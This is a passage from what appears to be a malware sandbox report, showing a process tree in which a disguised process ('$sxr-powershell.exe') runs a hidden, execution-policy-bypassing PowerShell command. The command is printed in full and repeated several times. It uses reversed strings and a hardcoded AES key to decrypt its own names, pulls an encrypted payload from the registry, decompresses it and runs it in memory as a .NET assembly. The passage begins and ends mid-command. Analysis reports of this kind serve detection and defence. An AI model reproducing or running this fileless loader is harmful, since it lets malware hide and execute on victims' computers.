'')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        37⤵
        
        PID:7904
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        37⤵
        
        PID:4048
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        37⤵
        Hide Artifacts: Hidden Window
        
        PID:7296
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = 